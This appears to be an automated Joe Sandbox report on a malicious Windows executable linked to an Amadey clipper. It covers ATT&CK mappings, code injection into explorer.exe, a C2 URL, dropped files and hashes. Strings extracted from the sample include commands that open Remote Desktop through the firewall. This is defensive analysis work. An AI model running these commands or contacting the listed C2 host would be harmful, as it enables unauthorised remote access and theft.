ectWSMRXuOA9iNrf3B8VL3p4zQb0mqfWOcdSQ0FVvKUQAtPWVVATQu=URmYSzRG1FRqbcPy2VsK4XVrJvJdWSMpdcmoWSJ6UnJuaLLE1QIngGK0Ux3q1wMmVcmpWR5CVB==XtBBJyw=RwWrVSRlhGRgdwPp2f9qQlmNWPRwdxMRaM zRwWrVSRlhGRgdwPp2f9qQlqNWPRwdxMRaM zUQ LSA uYlZ8TLjj3f4qg24VUxhqdcImdTNlQgN6U4ZtcbTu4yUchnSk9U8=UxKAWCRchF9cbLS=M BCLL==M BDJb==M BCKb==M BDKL==QTWD hRnhFNWaLvkXq==O pacdWzWBtlQAMpZMflLStlIdSm XpkeXBnIr7myv4ggSFdI9BrGdxTeX5gbST0ywz8Oi3bWyZtKq==J9ZlOSdihDM=I9BrGdxr3X8bIsZrFv==Uw 8WSFseHZnbr3l5zP=LMW9WRJUhHpqbczv2zgajSGtWO5wfwMqaMezWRM PV3kbvSgy ==I7==cSi6aBNoh38bLMKgBQL8RA==cTRd r==ccGzWB5mSSW Vh5agnUbTvD52WQR2FGtWOBw0MH=MtBBJywTQUo=MtBBJywTQkM=MtBBJywTQkQ=MtBBJywTQ32=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
            Command and Scripting Interpreter            		1
            Scheduled Task/Job            		511
            Process Injection            		11
            Masquerading            		OS Credential Dumping2
            System Time Discovery            		1
            Remote Desktop Protocol            		1
            Screen Capture            		1
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            Scheduled Task/Job            		11
            DLL Side-Loading            		1
            Scheduled Task/Job            		31
            Virtualization/Sandbox Evasion            		LSASS Memory231
            Security Software Discovery            		Remote Desktop Protocol1
            Archive Collected Data            		1
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            Abuse Elevation Control Mechanism            		511
            Process Injection            		Security Account Manager1
            Process Discovery            		SMB/Windows Admin SharesData from Network Shared Drive1
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook11
            DLL Side-Loading            		1
            Deobfuscate/Decode Files or Information            		NTDS31
            Virtualization/Sandbox Evasion            		Distributed Component Object ModelInput Capture11
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Abuse Elevation Control Mechanism            		LSA Secrets1
            Application Window Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
            Obfuscated Files or Information            		Cached Domain Credentials1
            Account Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
            DLL Side-Loading            		DCSync1
            System Owner/User Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
            File and Directory Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow134
            System Information Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 1576147 Sample: pTvHtQDXio.exe Startdate: 16/12/2024 Architecture: WINDOWS Score: 100 28 Suricata IDS alerts for network traffic 2->28 30 Found malware configuration 2->30 32 Multi AV Scanner detection for dropped file 2->32 34 6 other signatures 2->34 7 pTvHtQDXio.exe 2 2->7         started        10 comet.exe 2->10         started        process3 signatures4 44 Maps a DLL or memory area into another process 7->44 46 Switches to a custom stack to bypass stack traces 7->46 48 Found direct / indirect Syscall (likely to bypass EDR) 7->48 12 more.com 3 7->12         started        16 WerFault.exe 21 10->16         started        process5 file6 24 C:\Users\user\AppData\Local\Temp\nlhiojbr, PE32 12->24 dropped 50 Contains functionality to start a terminal service 12->50 52 Injects code into the Windows Explorer (explorer.exe) 12->52 54 Writes to foreign memory regions 12->54 56 2 other signatures 12->56 18 explorer.exe 12 12->18         started        22 conhost.exe 12->22         started        signatures7 process8 dnsIp9 26 62.60.226.15, 49714, 49715, 49717 ASLINE-AS-APASLINELIMITEDHK Iran (ISLAMIC Republic Of) 18->26 36 System process connects to network (likely due to code injection or exploit) 18->36 38 Contains functionality to start a terminal service 18->38 40 Contains functionality to inject code into remote processes 18->40 42 Switches to a custom stack to bypass stack traces 18->42 signatures10

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            pTvHtQDXio.exe50%ReversingLabsWin32.Worm.AutoRun

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\nlhiojbr100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Temp\nlhiojbr50%ReversingLabsWin32.Trojan.Generic

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://62.60.226.15/8fj482jd9/index.php0%Avira URL Cloudsafe
            http://62.60.226.15/8fj482jd9/index.php50%Avira URL Cloudsafe
            https://vovsoft.com/php/ocr_download.php?lang=0%Avira URL Cloudsafe
            http://62.60.226.15/8fj482jd9/index.php30%Avira URL Cloudsafe
            http://62.60.226.15/8fj482jd9/index.php?B0%Avira URL Cloudsafe
            http://www.color.org0%Avira URL Cloudsafe
            http://62.60.226.15/0%Avira URL Cloudsafe
            http://62.60.226.15/8fj482jd9/index.php10%Avira URL Cloudsafe
            https://vovsoft.com/translation/openU0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            No contacted domains info

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            http://62.60.226.15/8fj482jd9/index.phptrue
            • Avira URL Cloud: safe
            		unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://vovsoft.com/blog/how-to-activate-using-license-key/openUpTvHtQDXio.exefalse
              		high
              http://62.60.226.15/explorer.exe, 0000000A.00000002.3893734835.000000000338C000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.vmware.com/0pTvHtQDXio.exe, 00000000.00000002.1462371507.0000000004E23000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000002.00000002.1576492961.000000000511C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3894917972.0000000005304000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                http://vovsoft.compTvHtQDXio.exefalse
                  		high
                  http://www.aiim.org/pdfa/ns/id/pTvHtQDXio.exefalse
                    		high
                    https://vovsoft.com/translation/pTvHtQDXio.exefalse
                      		high
                      https://vovsoft.com/php/ocr_download.php?lang=pTvHtQDXio.exefalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.vmware.com/0/pTvHtQDXio.exe, 00000000.00000002.1462371507.0000000004E23000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000002.00000002.1576492961.000000000511C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3894917972.0000000005304000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://vovsoft.com/help/pTvHtQDXio.exefalse
                          		high
                          http://vovsoft.comopenUpTvHtQDXio.exefalse
                            		high
                            http://www.indyproject.org/pTvHtQDXio.exefalse
                              		high
                              http://vovsoft.comopenSpTvHtQDXio.exefalse
                                		high
                                http://62.60.226.15/8fj482jd9/index.php?Bexplorer.exe, 0000000A.00000002.3893734835.0000000003347000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.symauth.com/cps0(pTvHtQDXio.exe, 00000000.00000002.1462371507.0000000004E23000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000002.00000002.1576492961.000000000511C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3894917972.0000000005304000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.color.orgpTvHtQDXio.exefalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://vovsoft.com/blog/credits-and-acknowledgements/openpTvHtQDXio.exefalse
                                    		high
                                    http://62.60.226.15/8fj482jd9/index.php3explorer.exe, 0000000A.00000002.3893734835.000000000338C000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://vovsoft.com/pTvHtQDXio.exefalse
                                      		high
                                      http://62.60.226.15/8fj482jd9/index.php5explorer.exe, 0000000A.00000002.3893734835.000000000338C000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.symauth.com/rpa00pTvHtQDXio.exe, 00000000.00000002.1462371507.0000000004E23000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000002.00000002.1576492961.000000000511C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3894917972.0000000005304000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://62.60.226.15/8fj482jd9/index.php1explorer.exe, 0000000A.00000002.3893734835.000000000338C000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://vovsoft.com/blog/how-to-uninstall-vovsoft-software/openUpTvHtQDXio.exefalse
                                          		high
                                          https://vovsoft.com/translation/openUpTvHtQDXio.exefalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.info-zip.org/pTvHtQDXio.exe, 00000000.00000002.1462371507.0000000004DA1000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000002.00000002.1576492961.00000000050D4000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3894917972.00000000052BC000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://www.google.com/search?q=openSVpTvHtQDXio.exefalse
                                              		high
                                              http://vovsoft.com/openUpTvHtQDXio.exefalse
                                                		high

                                                World Map of Contacted IPs

                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs

                                                Public IPs

                                                IPDomainCountryFlagASNASN NameMalicious
                                                62.60.226.15
                                                		unknownIran (ISLAMIC Republic Of)
                                                		18013ASLINE-AS-APASLINELIMITEDHKtrue

                                                General Information

                                                Joe Sandbox version:41.0.0 Charoite
                                                Analysis ID:1576147
                                                Start date and time:2024-12-16 15:25:14 +01:00
                                                Joe Sandbox product:CloudBasic
                                                Overall analysis duration:0h 9m 1s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                Number of analysed new started processes analysed:16
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Sample name:pTvHtQDXio.exe
                                                renamed because original name is a hash value
                                                Original Sample Name:7c23cca92ddabc20911e0c51e19b002b.exe
                                                Detection:MAL
                                                Classification:mal100.troj.spyw.evad.winEXE@8/7@0/1
                                                EGA Information:
                                                • Successful, ratio: 66.7%
                                                HCA Information:
                                                • Successful, ratio: 100%
                                                • Number of executed functions: 27
                                                • Number of non-executed functions: 93
                                                Cookbook Comments:
                                                • Found application associated with file extension: .exe
                                                • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                Warnings

                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                • Excluded IPs from analysis (whitelisted): 20.189.173.21, 4.175.87.197, 40.126.53.8
                                                • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                • Execution Graph export aborted for target comet.exe, PID 7580 because there are no executed function
                                                • Not all processes where analyzed, report is missing behavior information
                                                • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                • VT rate limit hit for: pTvHtQDXio.exe

                                                Simulations

                                                Behavior and APIs

                                                TimeTypeDescription
                                                09:26:27API Interceptor1x Sleep call for process: pTvHtQDXio.exe modified
                                                09:26:41API Interceptor10117975x Sleep call for process: explorer.exe modified
                                                09:27:04API Interceptor1x Sleep call for process: WerFault.exe modified
                                                15:26:36Task SchedulerRun new task: comet path: C:\Users\user\AppData\Roaming\ancar\comet.exe

                                                Joe Sandbox View / Context

                                                IPs

                                                No context

                                                Domains

                                                No context

                                                ASNs

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                ASLINE-AS-APASLINELIMITEDHKIGz.arm7.elfGet hashmaliciousMiraiBrowse
                                                • 213.176.118.46
                                                sh4.xxx.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                • 185.177.25.107
                                                i586.xxx.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                • 185.177.25.107
                                                x86.xxx.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                • 185.177.25.107
                                                x32.xxx.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                • 185.177.25.107
                                                arm5.xxx.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                • 185.177.25.107
                                                mips.xxx.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                • 185.177.25.107
                                                arm7.xxx.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                • 185.177.25.107
                                                m68k.xxx.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                • 185.177.25.107
                                                ppc.xxx.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                • 185.177.25.107

                                                JA3 Fingerprints

                                                No context

                                                Dropped Files

                                                No context

                                                Created / dropped Files

                                                C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_comet.exe_e7bbc681222a1d73b6cf42d9a745c217a33551_d4022333_2404a44f-3851-48bd-874d-daae9a69eea3\Report.wer

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):0.8769037135332906
                                                Encrypted:false
                                                SSDEEP:96:gMuFQIFdSmsF4LXKWfxhQXIDcQtc6JXcENcw3nO+HbHgA5JHQbaVDPCEUjUg9Ot9:03FdSmu0Tt3z/jDRMzuiFYZ24IO8LC
                                                MD5:F6EB156CE4A6ACD7723A01E29324B549
                                                SHA1:EE4D7EC5E6558465F2DB9D976AD63718933B2C58
                                                SHA-256:7226872CFA948535BC4D47CF9B1FCB9C96C30CC40ABA80AEC9C5DD50275A7DDF
                                                SHA-512:9CDFF4BE82F851D39A24B78E312FA0616EC0030AFB1DFD9C059A1B5E957555112ACC80D2A2643769BE95F12058F9702C411E45A8BF299AC346007CEE0B80CEEA
                                                Malicious:false
                                                Reputation:low
                                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.8.8.3.2.7.9.7.6.0.4.2.6.6.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.8.8.3.2.7.9.8.6.0.4.2.6.7.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.4.0.4.a.4.4.f.-.3.8.5.1.-.4.8.b.d.-.8.7.4.d.-.d.a.a.e.9.a.6.9.e.e.a.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.1.a.0.6.8.f.c.-.5.c.b.c.-.4.e.3.9.-.a.4.a.5.-.8.b.e.3.3.1.3.5.d.4.1.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.c.o.m.e.t...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.C.i.t.i.z.e.n.M.P...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.9.c.-.0.0.0.1.-.0.0.1.3.-.3.5.0.7.-.a.6.8.3.c.6.4.f.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.3.9.e.a.4.9.c.a.e.e.b.a.0.d.d.c.d.e.b.a.1.1.d.b.5.3.9.9.3.7.c.0.0.0.0.0.9.0.4.!.0.0.0.0.f.0.e.0.7.a.6.8.c.a.3.6.6.8.1.e.c.e.4.2.c.2.3.d.7.5.3.5.1.d.5.1.a.9.b.5.2.a.8.

                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER200D.tmp.dmp

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Mini DuMP crash report, 15 streams, Mon Dec 16 14:26:38 2024, 0x1205a4 type
                                                Category:dropped
                                                Size (bytes):50084
                                                Entropy (8bit):2.008009381966637
                                                Encrypted:false
                                                SSDEEP:192:UEk+aXfhkPV+O5dIPxxrAQYITCE0zOwQ0nuzPPtwGIGotsK8MM:zCkHDIPbrAQnMOwnQt9Zo7k
                                                MD5:D361C816E90B42E3500363DF1D8E7E59
                                                SHA1:ACA31A636E4095E0105D464E1ED0A36668A09F93
                                                SHA-256:5C973F252227364BA0860AF174267C94A6083F86F5CFE13AB28598EC7A89D5EB
                                                SHA-512:80D61029247D7A10FA834A1838ECA3AEF84137B54F7282757D853826FF58281B2FEC005ED795EF83D76BAC0638C4D93CFCCA4C888F5DFB15D6E1E58FF727B28C
                                                Malicious:false
                                                Reputation:low
                                                Preview:MDMP..a..... ........8`g....................................$................,..........`.......8...........T......................................................................................................................eJ..............GenuineIntel............T............8`g............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER2260.tmp.WERInternalMetadata.xml

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):6272
                                                Entropy (8bit):3.7185840178403047
                                                Encrypted:false
                                                SSDEEP:96:RSIU6o7wVetbr565bKYN0VOLhT+lr75aM4U+89bPo5sfja9em:R6l7wVeJr564YCkhCbpr+89bg5sfuAm
                                                MD5:47DDFCC7D7474ED053C494644CDD9738
                                                SHA1:084861DE9C7A73DA9299221EA819C641F1B1B78B
                                                SHA-256:75075D25851F71896C0EBE3096B4EFDB1A7BDDB9DE332E1CCE689E134AA44DDF
                                                SHA-512:40185F6DDE6234DB538E8C1E20D68FB6BA34DFE61D58CC040F5BB4620E86997FF2FAF0F45EAF27E3D9A02A58DD9286E18CF893995636A61FFBA458A7662BC942
                                                Malicious:false
                                                Reputation:low
                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.5.8.0.<./.P.i.

                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER22AF.tmp.xml

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):4625
                                                Entropy (8bit):4.446841609991673
                                                Encrypted:false
                                                SSDEEP:48:cvIwWl8zscJg77aI9o7WpW8VYInYm8M4JngFUE+q80Fjw4eJd:uIjfaI7WK7V0J1ETjw4eJd
                                                MD5:EC7799EE4872D1DC6D9A973D7617824D
                                                SHA1:8C4CD6F8659474F3112C45B5311BFED5AA5F0A21
                                                SHA-256:32A1AEF0C0108C841BAC913F54A23929023CAC441356912ECFD179DF2FEEE7A4
                                                SHA-512:401B19EB0CF1B9121FE0F590BBE55E6C1E4244CB0025CAE60EA95789D9BA568BDD384537E066DC8E244062FFCBEFE9703E27694E13CCC6509D95EF9B2765E682
                                                Malicious:false
                                                Reputation:low
                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="633929" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                C:\Users\user\AppData\Local\Temp\7964f6ae

                                                Download File
                                                Process:C:\Users\user\Desktop\pTvHtQDXio.exe
                                                File Type:PNG image data, 2688 x 523, 8-bit/color RGB, non-interlaced
                                                Category:dropped
                                                Size (bytes):1167079
                                                Entropy (8bit):7.995473296971856
                                                Encrypted:true
                                                SSDEEP:24576:/s+ZOY+hto8bOn9Vb7RQnI/Itr0Qf/ZUMPZb6g5OH9xJ9WFi6M:Z+htxbOn9Vb7RQnd0G/Zb569xJJH
                                                MD5:D2AC740E7F02D1857D23CC613D2A3015
                                                SHA1:333427371D9FF322E761D306A42AB0D6A863E6F9
                                                SHA-256:B820EC17CFC9EEC57CABAA1B6E79173A5E6EF6BC0FDF0B456EC943E02BCA4D5F
                                                SHA-512:8A91B783255E60BF95F7653F2E5ECB693A009BABB580E37130721D845DDFC73ECE82A669E9EBF01FAEC7A10598C3603ECE8D82F130BC567F8747A7A72BB29933
                                                Malicious:false
                                                Reputation:low
                                                Preview:.PNG........IHDR.............M.[*.. .IDATx..wX.Y...L&.T.F@W.,......W...b. *(..."...{..b...J...+*....T..b[......I.S.AT...y.y(..w..;....$.N6`.....`......o...-.A..8....&.s.J.s...BQ.~....?.o.j..K...t:.X,......E....... .|....X,..oAQ.8:.1....8.h4.K..h4......K.F.0...V.)/..jMG7^..q......k...DX....at6..'.V.M.;..BY(.R..`l....p-at6. ..R...P..Z....pt\W....Z[.-...$...1b../&.`d.(a.)o.....q.'....#....0...3.O@.. ...[X,..S.F..@>.p.bt=.k..#.8.S......?4%..8.k...3.J4!..hE......|B.1b.#.K...s..=.A..1......_....0 S>. p..x)......s.O...Q.q......P.A.b1..H.(j...l./..KI..K..l8...l.|.j5!.7..j........jt...,.........l.p.N..._F.....<H`..F$1..F..1..s0.C.4..s.L.NH.2..t........t........./E..@.a..... ....u....."(.pB\@....9........... .3...)..G....at..b.@>.........U.l!.bh..p...?#...}Q}...j.........?. .x..@.._b..-.R..6......d.........|.....8N...C.NKA...7......C.."....\..!.P@>........1( ........U.s..1.@p..t.....)..d......\.F..1....?..U..l..j...Y(..&.<..........K.|...1.....Q...0..

                                                C:\Users\user\AppData\Local\Temp\79c8f363

                                                Download File
                                                Process:C:\Users\user\Desktop\pTvHtQDXio.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):1174134
                                                Entropy (8bit):7.600376035602856
                                                Encrypted:false
                                                SSDEEP:24576:fQZT3SlEwCflcLITJDIQmfOl59RgXpDx0BRKGrE:fQZT3SlEwCWIIfCNqpDxsRrE
                                                MD5:21954399F545BFDD16767A1C22F37DA3
                                                SHA1:516E5F1C659326F3F11B672CD12BF56BF88E2768
                                                SHA-256:987B8430FF016AF3AF88E6AA88796F478B2F1AD5B3B9ADE8A023DA8F2B27A6C8
                                                SHA-512:A13881297C64264AA14EC4FEACE01B2DF5A1507C889B9E2CBAB60CC36C5ED18D769CC839F90FE02C7A838B42885B4A48F99728BF10D88160C2D6B8361FE0CABC
                                                Malicious:false
                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\Users\user\AppData\Local\Temp\nlhiojbr

                                                Download File
                                                Process:C:\Windows\SysWOW64\more.com
                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):442880
                                                Entropy (8bit):6.4982216030674
                                                Encrypted:false
                                                SSDEEP:12288:Hj98bKozHw6UGa0WPp7XlcoMGXidheK7t5kMT:mHwBhBbMUi2IkU
                                                MD5:CDD48A5FDFA37AC1971CCD04D513FCCE
                                                SHA1:4FB51E67F61373E2854B26D9DBA339C51D93D375
                                                SHA-256:BCDE8C2C0B3927A17000D4D8094270909726580526B6D719143BA61B09A05950
                                                SHA-512:5B4E8A01A52CDE7A711E79A3D04144AF839F8C5B2E3662025BEBFA55E94C91A974D0493A2F0DC52A7D31ABE2043DC301407B9245DED8F53E5297C7942026BD61
                                                Malicious:true
                                                Yara Hits:
                                                • Rule: JoeSecurity_Amadey_3, Description: Yara detected Amadey\'s Clipper DLL, Source: C:\Users\user\AppData\Local\Temp\nlhiojbr, Author: Joe Security
                                                Antivirus:
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: ReversingLabs, Detection: 50%
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........BS..,...,...,.../...,...).#.,..(...,../...,..)...,.......,...(...,...-...,...-.j.,.U.%...,.U.....,.U.....,.Rich..,.........PE..L....TT..........................................@..........................@............@.................................@E...................................E......8...............................@...............<............................text............................... ..`.rdata..PH.......J..................@..@.data....m...`...,...B..............@....rsrc................n..............@..@.reloc...E.......F...p..............@..Bhcj..........0......................@...................................................................................................................................................................................................................................................................

                                                Static File Info

                                                General

                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                Entropy (8bit):7.510572735424233
                                                TrID:
                                                • Win32 Executable (generic) a (10002005/4) 99.94%
